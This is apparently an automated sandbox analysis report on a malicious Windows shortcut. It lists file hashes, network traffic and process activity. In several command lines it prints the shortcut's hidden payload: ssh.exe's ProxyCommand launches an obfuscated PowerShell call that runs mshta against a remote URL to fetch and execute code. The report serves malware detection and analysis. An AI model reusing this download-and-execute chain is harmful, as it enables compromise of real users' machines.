                                SHA1:57E0EF0FCE710F5E399752C5639ADB007ACD84C7
                                SHA-256:E388486F343644AEC78F63C5760EDA3D76C3839B2A1870638EF643BEA8545795
                                SHA-512:2058D2051004673892BA9DE298A7B18A0C03DEBD8B2F0EF3D752F770BB9E73AF296AACA4E9D792771F9CE2DEF3542784320ED4761543750908EED7366B8FF36D
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\System32\svchost.exe
                                File Type:COM executable for DOS
                                Category:dropped
                                Size (bytes):16384
                                Entropy (8bit):0.08029941034443144
                                Encrypted:false
                                SSDEEP:3:3/8YejRqeuNaAPaU1lro/lolluxmO+l/SNxOf:P8zjRluNDPaUD9gmOH
                                MD5:565A92330DF73299E4197E7BA86B4D54
                                SHA1:A5480F4112640EB64278E5A50BC13772F5F01ACF
                                SHA-256:46A2C420796C3A7FD484911213C9B5DAC806ABD282A23D5F9980EF7D060EAB10
                                SHA-512:11D741137B4666424FE752B0937ED5E0AEE0187DFD609F07620DC216B0FF1C7F95E3C1432F074018B64963D93F8215039EE1CD24F08A25550250B3CE55290C1E
                                Malicious:false
                                Reputation:low
                                Process:C:\Windows\System32\mshta.exe
                                File Type:ASCII text, with very long lines (24050)
                                Category:dropped
                                Size (bytes):24051
                                Entropy (8bit):4.941039417164537
                                Encrypted:false
                                SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                MD5:5E8C69A459A691B5D1B9BE442332C87D
                                SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                Malicious:false
                                Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w
                                Process:C:\Windows\System32\mshta.exe
                                File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):452
                                Entropy (8bit):7.0936408308765495
                                Encrypted:false
                                SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                MD5:C33DE66281E933259772399D10A6AFE8
                                SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.742582331134527
                                Encrypted:false
                                SSDEEP:3:Nlllul:NllU
                                MD5:D5EA69D574B45F59D5603CC768ADEC44
                                SHA1:B37A4F574EC363E2DD2536941DA0F9B09BD979FF
                                SHA-256:19AD8E2709420CF64185F14B06616636F9FABC38DD3727E4F01B03D8D0AF04D7
                                SHA-512:BEF2D830C4ED0F8A252F75523DEAD3B18BF91B5916147F48264E8FD71E7E5815605A3984FC67F93A39F12D3B006177E46D80141CF2371B9CF67EEB60D30078ED
                                Malicious:false
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\svchost.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):55
                                Entropy (8bit):4.306461250274409
                                Encrypted:false
                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                Malicious:false
                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                Entropy (8bit):2.704198709343711
                                TrID:
                                • Windows Shortcut (20020/1) 100.00%
                                File name:HngJMpDqxP.lnk
                                File size:2'466 bytes
                                MD5:c90cd850078a3688894afc507e6b9ce8
                                SHA1:7f9a31f6fef0350c319380e367e7f612f3ecce14
                                SHA256:70f3b05eb07d9af8dddbd9b5a0aa2e27bf4feda3bef1d4c1b50aaa4c722a1050
                                SHA512:7692a63cf069ac6a3ed48f8cce58a67c53e4f4461fb2238371f7938732e2c60d17a86258fcbcc34a704bd92256fb545f99f5402d50adc118e9795ea0816ea317
                                SSDEEP:24:8lj/BF//Z/Udt1v+/+G4WbUk6QZNfQt8KKdd79dsHhWUIeFIU:81LZwG4aUkjNfBKKdJ9Z5W
                                TLSH:895132043AF91725F3B39A7594BAA321853BBC46EEB29B0E004D02881727615E472F6B
                                Icon Hash:72d282828e8d8dd5

                                General

Relative Path: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Command Line Argument: -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" .
Icon location: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 15:41:47.831351042 CET | 51637 | 53 | 192.168.2.6 | 1.1.1.1
Dec 31, 2024 15:41:47.842442036 CET | 53 | 51637 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 15:41:47.831351042 CET | 192.168.2.6 | 1.1.1.1 | 0x165e | Standard query (0) | klipzynigou.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 15:41:47.842442036 CET | 1.1.1.1 | 192.168.2.6 | 0x165e | No error (0) | klipzynigou.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 15:41:47.842442036 CET | 1.1.1.1 | 192.168.2.6 | 0x165e | No error (0) | klipzynigou.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                • klipzynigou.shop
                                • https:
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49718 | 188.114.97.3 | 443 | 6096 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 14:41:48 UTC | 329 | OUT | GET /An4me.mp4 HTTP/1.1
                                Accept: */*
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: klipzynigou.shop
                                Connection: Keep-Alive
2024-12-31 14:41:48 UTC | 562 | IN | HTTP/1.1 403 Forbidden
                                Date: Tue, 31 Dec 2024 14:41:48 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Frame-Options: SAMEORIGIN
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5om3NfZWMUo%2BVpO29cMNIZFag%2B6iIRnXolkfymaae691alAt%2B9mWIQarL1KBn8M2IBal4P9UJsTM%2FI7cwFXriFQghoqgH0YYkJRMP%2F97OaUt%2Bp%2Bnl%2B5IAcqQYtS00HC0ymAM"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8fab0858a929437e-EWR
2024-12-31 14:41:48 UTC | 807 | IN
                                Data Ascii: 11ca<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-12-31 14:41:48 UTC | 1369 | IN
                                Data Ascii: cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElemen
                                Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form
                                Data Ascii: veal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><


                                Session ID:1
                                Source IP:192.168.2.6
                                Source Port:49719
                                Destination IP:188.114.97.34
                                Destination Port:443
                                PID:6096
                                Process:C:\Windows\System32\mshta.exe
                                Timestamp:2024-12-31 14:41:49 UTC
                                Bytes transferred:393
                                Direction:OUT
                                Data:GET /cdn-cgi/styles/cf.errors.css HTTP/1.1
                                Accept: */*
                                Referer: https://klipzynigou.shop/An4me.mp4
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: klipzynigou.shop
                                Connection: Keep-Alive
                                Timestamp:2024-12-31 14:41:49 UTC
                                Bytes transferred:411
                                Direction:IN
                                Data:HTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 14:41:49 GMT
                                Content-Type: text/css
                                Content-Length: 24051
                                Connection: close
                                Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                ETag: "675fc4ac-5df3"
                                Server: cloudflare
                                CF-RAY: 8fab085cfcca429a-EWR
                                X-Frame-Options: DENY
                                X-Content-Type-Options: nosniff
                                Expires: Tue, 31 Dec 2024 16:41:49 GMT
                                Cache-Control: max-age=7200
                                Cache-Control: public
                                Accept-Ranges: bytes


                                Session ID:2
                                Source IP:192.168.2.6
                                Source Port:49720
                                Destination IP:188.114.97.34
                                Destination Port:443
                                PID:6096
                                Process:C:\Windows\System32\mshta.exe
                                Timestamp:2024-12-31 14:41:50 UTC
                                Bytes transferred:411
                                Direction:OUT
                                Data:GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                Accept: */*
                                Referer: https://klipzynigou.shop/An4me.mp4
                                Accept-Language: en-CH
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: klipzynigou.shop
                                Connection: Keep-Alive
                                Timestamp:2024-12-31 14:41:50 UTC
                                Bytes transferred:409
                                Direction:IN
                                Data:HTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 14:41:50 GMT
                                Content-Type: image/png
                                Content-Length: 452
                                Connection: close
                                Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                ETag: "675fc4ac-1c4"
                                Server: cloudflare
                                CF-RAY: 8fab0861ad99ef9d-EWR
                                X-Frame-Options: DENY
                                X-Content-Type-Options: nosniff
                                Expires: Tue, 31 Dec 2024 16:41:50 GMT
                                Cache-Control: max-age=7200
                                Cache-Control: public
                                Accept-Ranges: bytes


                                Target ID:1
                                Start time:09:41:42
                                Start date:31/12/2024
                                Path:C:\Windows\System32\OpenSSH\ssh.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)" .
                                Imagebase:0x7ff7fe0d0000
                                File size:946'176 bytes
                                MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:2
                                Start time:09:41:42
                                Start date:31/12/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:3
                                Start time:09:41:43
                                Start date:31/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell powershell -Command '[LJqOM0_FFu}{mshta https://klipzynigou.shop/An4me.mp4[LJqOM0_FFu}{'.SubString(13, 40)
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:09:41:45
                                Start date:31/12/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://klipzynigou.shop/An4me.mp4"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:09:41:46
                                Start date:31/12/2024
                                Path:C:\Windows\System32\mshta.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\mshta.exe" https://klipzynigou.shop/An4me.mp4
                                Imagebase:0x7ff673e60000
                                File size:14'848 bytes
                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:7
                                Start time:09:41:49
                                Start date:31/12/2024
                                Path:C:\Windows\System32\svchost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                Imagebase:0x7ff7403e0000
                                File size:55'320 bytes
                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2398326074.00007FFD33DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33DD0000, based on PE: false
                                  • Joe Sandbox IDA Plugin Snapshot File: hcaresult_4_2_7ffd33dd0000_powershell.jbxd
                                  • Opcode ID: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                  • Instruction ID: 4d8af3db3da5de1f90655ea53577bf690696af590e26dd02b4c002e41850daea
                                  • Opcode Fuzzy Hash: 6b7eb879aeff2565d6fe36d34af01aa9e22e2b06d64cdbf2127ecae66d78e1e9
                                  • Instruction Fuzzy Hash: F201677161CB0C4FD744EF4CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2398326074.00007FFD33DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33DD0000, based on PE: false
                                  • Joe Sandbox IDA Plugin Snapshot File: hcaresult_4_2_7ffd33dd0000_powershell.jbxd
                                  • Opcode ID: 592a04605327799e3ec4bd060826467f3929abc551e10581fb512fa79ddd5f41
                                  • Instruction ID: aa2ed54fdb90f5ae3af23b78993122e986d30214f12fc7c7fe8af4a255f9dff3
                                  • Opcode Fuzzy Hash: 592a04605327799e3ec4bd060826467f3929abc551e10581fb512fa79ddd5f41
                                  • Instruction Fuzzy Hash: 9122A167B0E7D25FE30397AC6CB50D57FA0EF5326570900FBC2D89B093E919980A97A1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2398326074.00007FFD33DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33DD0000, based on PE: false
                                  • Joe Sandbox IDA Plugin Snapshot File: hcaresult_4_2_7ffd33dd0000_powershell.jbxd
                                  • Opcode ID: a56641cd4ae5954cdef2677f3230aae9e96604c56e00880fd07170e31ddf4178
                                  • Instruction ID: ced0e6c28a8bddab6cf2d170f5de030c39678063e3da1379d9fe0ee61b5ca5f7
                                  • Opcode Fuzzy Hash: a56641cd4ae5954cdef2677f3230aae9e96604c56e00880fd07170e31ddf4178
                                  • Instruction Fuzzy Hash: 02918E93A0E6E20FE712A7ACBDF11D67F70DF4326470901B7D1C89B093E918690A93A1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3611401575.000001B27FE10000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001B27FE10000, based on PE: false
                                  • Joe Sandbox IDA Plugin Snapshot File: hcaresult_5_2_1b27fe10000_mshta.jbxd
                                  • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                  • Instruction ID: ed4aa8d6e4a9b85291d3a409de7f07b8169b8528aeb3b09569ab491c4b606548
                                  • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                  • Instruction Fuzzy Hash: CC90021449D44656D41821920C4669C7040639C290FE44490951690144DA5D029B5256